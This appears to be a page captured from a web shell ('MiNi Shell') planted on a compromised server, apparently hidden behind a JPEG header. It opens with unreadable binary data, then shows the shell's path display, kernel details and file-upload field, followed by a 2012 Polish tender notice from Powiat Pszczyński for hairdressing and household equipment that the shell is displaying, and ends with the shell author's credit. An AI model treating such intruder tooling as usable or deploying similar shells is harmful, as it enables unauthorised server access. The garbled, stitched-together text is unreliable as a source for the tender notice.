JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121121/246075-N-2012.html

<p class="kh_header"><b>Pszczyna: Doposażenie pracowni praktycznej nauki zawodu, dostawa materiałów dydaktycznych dla placówek oświatowych realizowana w ramach projektu Mam zawód - mam pracę w regionie część F i G.</b><br>
<b>Numer ogłoszenia: 246075 - 2012; data zamieszczenia: 21.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pszczyński , ul. 3 Maja 10, 43-200 Pszczyna, woj. śląskie, tel. 032 4492300, 032 4492399, faks 032 4492345.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pszczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie pracowni praktycznej nauki zawodu, dostawa materiałów dydaktycznych dla placówek oświatowych realizowana w ramach projektu Mam zawód - mam pracę w regionie część F i G..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Doposażenie pracowni praktycznej nauki zawodu, dostawa materiałów dydaktycznych dla placówek oświatowych realizowana w ramach projektu pn. Mam zawód - mam pracę w regionie część F i G.1
Dostawa części F (sprzętu fryzjerskiego) obejmuje m.in.: Etui na narzędzia fryzjerskie, Suszarki, Prostownice,Lokówki, Ceramiczna szczotka do modelowania, Zestaw grzebieni,Szczotka do koka,Klipsy do włosów  Maszynka do włosów,Wyciskacz do farb,Komplet cermicznych szczotek o różnych średnicach,Kufer fryzjerski,Profesjonalny shaker do mieszania farb do koloryzacji włosów,Hoker fryzjerski,Falownica tytanowo-turmalinowa. 
Dostawa części G (sprzętu gospodarstwa domowego) obejmuje m.in.: 
noże do carvingu, drylownicę do jabłek,foremki do carvingu ,
łyżki carvingowa do owoców i lodów,zestawy noży do carvingu,
zestawy foremek do carvingu, automaty do wypieku chleba
miksery kuchenne, blachy do ciast.
Ze względu na charakter przedmiotu dostawy i umożliwienie udziału w postępowaniu jak najszerszej grupie wyspecjalizowanych wykonawców, całość zamówienia podzielono na  2  odrębne części:
a.CZĘŚĆ F - SPRZĘT  FRYZJERSKI.
Szczegółowy zakres zawarto w załączniku nr 1 do siwz Zakres dostawy
 część F.
b.CZĘŚĆ G-  SPRZĘT GOSPODARSTWA DOMOWEGO.
Szczegółowy zakres zawarto w załączniku nr 1 do siwz Zakres dostawy, część G.
Przedstawiony w ofercie sprzęt winien posiadać świadectwo lub atest dopuszczenia do obrotu i użytku na terenie UE (zgodnie ze stosowaną dyrektywą UE w zakresie podstawowych wymogów bezpieczeństwa i zdrowia) oraz posiadać deklarację zgodności CE. 
Dostarczony przez Wykonawcę sprzęt i narzędzia musi posiadać instrukcję obsługi w języku polskim. 
W przypadku określenia elementów przedmiotu zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia, Zamawiający dopuszcza zastosowanie materiałów, urządzeń  i systemów równoważnych.
Zamawiający wyjaśnia, iż pod pojęciem równoważności rozumie inny materiał, urządzenie czy system pochodzący od innego producenta  niż wskazany w załączniku nr 1 do SIWZ (poszczególnych jego częściach) - zakres dostawy, pod warunkiem, że służy do tego samego celu, posiada takie same lub lepsze parametry techniczne, jakościowe, funkcjonalne oraz użytkowe co produkt oryginalny. Ponadto równoważność oznacza materiał, urządzenie czy system nie gorszy gatunkowo niż określony w załączniku nr 1 do SIWZ - zakres dostawy; ponadto wskazanie znaku towarowego lub pochodzenia nadaje wymienionym konkretnym produktom tylko charakter przykładowy jako określenie standardów i parametrów. 	
Zakres zamówienia, poza dostawą sprzętu, narzędzi i urządzeń określonych w załączniku nr 1 do SIWZ, obejmuje:
a.	Montaż w miejscu dostawy: odpowiednio ze wskazaniem zamieszczonym w załączniku nr 1 Zakres Dostawy (w zależności od części zamówienia).
b.Dostarczenie dokumentów gwarancyjnych, aprobat technicznych, atestów dopuszczenia do obrotu i użytku, certyfikatów bezpieczeństwa itp. szczególnie w zakresie zastosowania w obiektach użyteczności publicznej  - adekwatnie do danego elementu zamówienia.
c. Instruktaż stanowiskowy dla wyznaczonej przez użytkownika/Dyrektora szkoły osoby w zakresie użytkowania i obsługi urządzeń wchodzących w skład pracowni praktycznej nauki zawodu, odpowiednio dla poszczególnych elementów zamówienia.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu  zakupów.
Wartość zamówienia nie przekracza kwot określonych w przepisach wydanych na podstawie  art. 11 ust. 8 ustawy Prawo Zamówień Publicznych ustawy z dnia  29 stycznia 2004r. - Prawo Zamówień Publicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.30.00.00-5, 33.71.16.00-3, 39.70.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia i dokumenty, których przedłożenia w ofercie żąda Zamawiający: 
a.	wypełniony Formularz ofertowy -  załącznik nr 2 do SIWZ (odpowiednio dla wybranej Części).
b.	Szczegółową wycenę przedmiotu zamówienia zgodnie z załącznikiem nr 1 do SIWZ (sposób wyliczenia zawarto w załączniku nr 1 do SIWZ Zakres Dostawy, odpowiednio dla wybranej części zamówienia).

Inne oświadczenia i dokumenty, które Zamawiający zaleca załączyć do oferty:
Zaświadczenie o wpisie do ewidencji działalności gospodarczej - służy właściwej weryfikacji należytej reprezentacji podmiotu, przedłożenie dokumentu umożliwi Zamawiającemu dokonanie oceny czy osoba fizyczna, składająca oświadczenie woli w postaci oferty w postępowaniu o udzielenie zamówienia publicznego, prowadzi działalność gospodarczą zarejestrowaną  przez właściwy organ. Zamawiający dokonując oceny oferty musi mieć jednoznaczną informację o statusie cywilnoprawnym wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany do umowy możliwe są jedynie w trybie art. 144 ustawy PZP. Uzgodnienia w tym zakresie wymagają dla swej ważności zatwierdzenia przez Zamawiającego, a zmiana umowy może nastąpić jedynie na piśmie w formie aneksu pod rygorem nieważności.
Zamawiający dopuszcza możliwość zmiany umów/umowy w następujących okolicznościach:
a.	ustawowej zmiany przepisów podatkowych,
b.	zmiana ceny przy zaistnieniu zmian stawek podatkowych 
c.	działania siły wyższej,
d.	rezygnacji Zamawiającego z wykonania pełnego zakresu dostaw z jednoczesnym ograniczeniem (obniżeniem) wynagrodzenia Dostawcy,
e.	poprawy oczywistej omyłki.
f.	zmiana terminu realizacji zamówienia spowodowana przerwami w realizacji dostaw powstałych z przyczyn nie leżących po stronie Dostawcy;
g.	pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji umowy;
h.	zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych; 
i.	zmiana lub wprowadzenie podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;
j.	zmiana osób odpowiedzialnych za realizację zamówienia,  nadzór nad przedmiotem umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.pszczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pszczynie,parter pok. 5 Wydział Zamówień Publicznych lub przesyłką pocztową (poleconą) na adres: Starostwo Powiatowe w Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Pszczynie, I piętro pok. 35 Sekretariat lub przesyłką pocztową (poleconą) na adres: Starostwo Powiatowe w Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach projektu pn. Mam zawód - mam pracę w regionie Priorytet IX Rozwój wykształcenia i kompetencji w regionach,  Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część F: Sprzęt Fryzjerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa części F (sprzętu fryzjerskiego) obejmuje m.in.: Etui na narzędzia fryzjerskie, Suszarki, Prostownice,Lokówki, Ceramiczne szczotka do modelowania, Zestaw grzebieni,Szczotka do koka,Klipsy do włosów  Maszynkę do włosów,Wyciskacz do farb,Komplet termicznych szczotek o różnych średnicach,Kufer fryzjerski,Profesjonalny shaker do mieszania farb do koloryzacji włosów,Hoker fryzjerski,Falownica tytanowo-turmalinowa. 
Szczegółowy zakres przedmiotu zamówienia zawarto w załączniku nr 1 do siwz Dostawa sprzętu fryzjerskiego.Część F..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.71.16.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część G. Dostawa sprzętu gospodarstwa domowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa części G (sprzętu gospodarstwa domowego) obejmuje m.in.: 
noże do carvingu, Drylownicę do jabłek,Foremki do carvingu ,
Łyżki carvingowa do owoców i lodów,zestawy noży do carvingu,
zestawy foremek do carvingu, automaty do wypieku chleba
Miksery kuchenne, blachy do ciast.
Szczegółowy zapis zawarto w załączniku nr 1 do siwz Zakres dostawy. Część G.Dostawa sprzętu gospodarstwa domowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com